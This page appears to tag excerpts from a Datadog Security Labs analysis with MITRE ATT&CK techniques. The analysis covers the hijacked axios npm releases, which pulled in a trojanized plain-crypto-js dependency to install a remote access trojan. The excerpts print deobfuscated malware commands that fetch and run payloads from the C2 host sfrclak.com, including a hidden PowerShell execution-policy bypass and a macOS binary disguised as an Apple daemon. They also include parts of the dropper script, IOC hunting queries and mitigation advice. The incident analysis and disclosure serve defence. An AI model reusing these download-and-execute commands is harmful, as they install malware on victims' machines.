TTPwire Vol. 1 · MITRE ATT&CK · Tagged


Datadog Security Labs

Compromised axios npm package delivers cross-platform RAT

2026-03-31

ATT&CK techniques detected

26 predictions
T1195.001 Compromise Software Dependencies and Development Tools
98%
"…GHSA-fw8c-xr5c-95f9 (GitHub advisory) - axios/axios#10604 (GitHub issue) - StepSecurity: axios compromised on npm - axios/axios#10636 - maintainer account compromise details (GitHub issue). Acknowledgements: thanks to Matt Muir, Sebastian Obregoso, Eslam Salem…"
T1195.001 Compromise Software Dependencies and Development Tools
97%
"…is identical to 1.14.0. The only meaningful change to package.json was a new dependency: "plain-crypto-js": "^4.2.1", a name meant to resemble the legitimate crypto-js, never imported by any axios code. We have not independently analyzed 0.30.4, but StepSecuri…"
T1059.001 PowerShell
97%
"…] No such file or directory. The attacker imported pwd (which provides pwd.getpwuid(os.getuid()).pw_name, a portable alternative) but never used it. A second bug affects the binary execution handler (peinject). The function do_action_ijt() references an undefin…"
T1195.001 Compromise Software Dependencies and Development Tools
97%
"Compromised axios npm package delivers cross-platform RAT. Key points and observations: - On March 31, 2026, an attacker hijacked an axios npm maintainer account and published two malicious releases: axios@1.14.1 and axios@0.30.4. - These malicious releases add a trojaniz…"
T1195.001 Compromise Software Dependencies and Development Tools
96%
"…-s3 → @aws-sdk/signature-v4-crt → aws-crt → axios. Because aws-crt declares axios@"^1.12.2", running npm install during the compromise window would have resolved to the malicious 1.14.1. Review CI/CD jobs that ran during the compromise window. CI/CD pipe…"
T1059.001 PowerShell
96%
"…a .ps1 payload from the C2 and executes it in hidden mode with execution policy bypass:
curl -o %TEMP%\6202033.ps1 -d packages.npm.org/product1 -s http://sfrclak.com:8000/6202033
%PROGRAMDATA%\wt.exe -w hidden -ep bypass -file %TEMP%\6202033.ps1…"
T1195.001 Compromise Software Dependencies and Development Tools
95%
"…problem: - At 01:38 UTC, digitalbrainjs opened PR #10591 to add a deprecation workflow for the compromised versions. digitalbrainjs flagged the issue deletions to the community. digitalbrainjs contacted npm directly and got all compromised versions and tokens revoked within a…"
T1195.001 Compromise Software Dependencies and Development Tools
94%
"…// ... other maintainers unchanged ] Note: npm has since removed 1.14.1 from the registry and reverted dist-tags.latest to 1.14.0. The per-version metadata for 1.14.1 is no longer available through the public API, but the time object still records its publication time…"
T1195.002 Compromise Software Supply Chain
94%
"…publish the malicious versions. The technique matches a pattern documented by Google in campaigns targeting open source maintainers: - The attacker reached out impersonating the founder of a company, using the real founder's likeness and branding. - They invited the maintainer…"
T1195.001 Compromise Software Dependencies and Development Tools
91%
"…. - Most package managers now support a dependency cooldown setting that skips newly published versions, giving the community time to flag compromised releases before they reach your builds. Jump to recommendations. Note on Datadog's exposure: several components that Datadog m…"
T1195.001 Compromise Software Dependencies and Development Tools
84%
"…- End: 2026-03-31T03:25:00Z. Protecting against similar attacks: The compromised packages have been removed, but npm supply chain attacks are growing more frequent. The following measures can reduce your exposure to similar incidents. Implement dependency cooldown: When popul…"
T1587 Develop Capabilities
77%
"Compromised axios npm package delivers cross-platform RAT. Key points and observations: - On March 31, 2026, an attacker hijacked an axios npm maintainer account and published two malicious releases: axios@1.14.1 and axios@0.30.4. - These malicious releases add a trojaniz…"
T1195.001 Compromise Software Dependencies and Development Tools
74%
"…section lists network indicators, file paths, and payload hashes that can help you identify compromised machines or CI pipelines. Query these IOCs against any available telemetry data (EDR platforms, firewall logs, observability data) to surface potentially compromised systems.…"
T1027 Obfuscated Files or Information
70%
"…a package. Since axios@1.14.1 lists plain-crypto-js as a dependency, npm install axios triggers the chain: npm installs plain-crypto-js, then runs setup.js. The package also ships a second file, package.md, which is a copy of package.json without the postinstall e…"
T1059.004 Unix Shell
64%
"…nc } = require("child_process"); const platform = os.platform(); const tmpdir = os.tmpdir(); const e = "local_path"; const s = "ps_path"; const a = "scr_link"; const c = "ps_binary"; const q = "http://sfrclak.com:8000/6202033"; le…"
T1195.001 Compromise Software Dependencies and Development Tools
64%
"…y): same C2 commands, same system enumeration, same POST parameters. It can also retrieve and execute AppleScript payloads via osascript, stored under /tmp/.xxxxxx.scpt. Build artifacts leak the attacker's development path (/Users/mac/Desktop/jain_dev/client…"
T1105 Ingress Tool Transfer
50%
"…t refreshed yet. Hunt for follow-on activity by analyzing C2 traffic and file system artifacts across logs and workload telemetry data: @dns.question.name:sfrclak.com @network.destination.ip:142.11.206.73 @network.destination.port:8000 @file.path:(*com…"
T1587 Develop Capabilities
49%
"…is identical to 1.14.0. The only meaningful change to package.json was a new dependency: "plain-crypto-js": "^4.2.1", a name meant to resemble the legitimate crypto-js, never imported by any axios code. We have not independently analyzed 0.30.4, but StepSecuri…"
T1195.002 Compromise Software Supply Chain
49%
"…problem: - At 01:38 UTC, digitalbrainjs opened PR #10591 to add a deprecation workflow for the compromised versions. digitalbrainjs flagged the issue deletions to the community. digitalbrainjs contacted npm directly and got all compromised versions and tokens revoked within a…"
T1059.007 JavaScript
48%
"…a platform-specific RAT on macOS, Windows, and Linux, then removes all traces of the hook from disk. How plain-crypto-js delivers the payload: plain-crypto-js@4.2.1 is a clone of the real crypto-js@4.2.0 with a scripts block added to its package.json: - "nam…"
T1564.004 NTFS File Attributes
45%
"…/product0" & " -s " & s & " && chmod 770 " & d & " && /bin/zsh -c \\"" & d & " " & s & " &\\" &> /dev/null" end try do shell script "rm -rf local_path"`; script = script.replaceAll(a, q); script = script.replaceAll(e, r); fs.writeFileSync(r…"
T1587 Develop Capabilities
42%
"…GHSA-fw8c-xr5c-95f9 (GitHub advisory) - axios/axios#10604 (GitHub issue) - StepSecurity: axios compromised on npm - axios/axios#10636 - maintainer account compromise details (GitHub issue). Acknowledgements: thanks to Matt Muir, Sebastian Obregoso, Eslam Salem…"
T1204.002 Malicious File
41%
"…and executes a binary disguised as an Apple system daemon:
# deobfuscated AppleScript content
curl -o /Library/Caches/com.apple.act.mond \
  -d packages.npm.org/product0 \
  -s http://sfrclak.com:8000/6202033
chmod 770 /Library/Caches/com.apple.act.mo…"
T1204.005 Malicious Library
40%
"Compromised axios npm package delivers cross-platform RAT. Key points and observations: - On March 31, 2026, an attacker hijacked an axios npm maintainer account and published two malicious releases: axios@1.14.1 and axios@0.30.4. - These malicious releases add a trojaniz…"
T1195.001 Compromise Software Dependencies and Development Tools
39%
"…Potential indicators of compromise. Analyze your package.json for the presence of axios: check whether your package.json includes axios, and whether the version constraint could have resolved to a malicious version. $ cat package.json | grep axios → "axios": "^1.13.0". The …"
T1059.001 PowerShell
37%
"…and executes a binary disguised as an Apple system daemon:
# deobfuscated AppleScript content
curl -o /Library/Caches/com.apple.act.mond \
  -d packages.npm.org/product0 \
  -s http://sfrclak.com:8000/6202033
chmod 770 /Library/Caches/com.apple.act.mo…"

Summary

An attacker hijacked an axios maintainer's npm account to publish malicious releases that deliver a cross-platform RAT.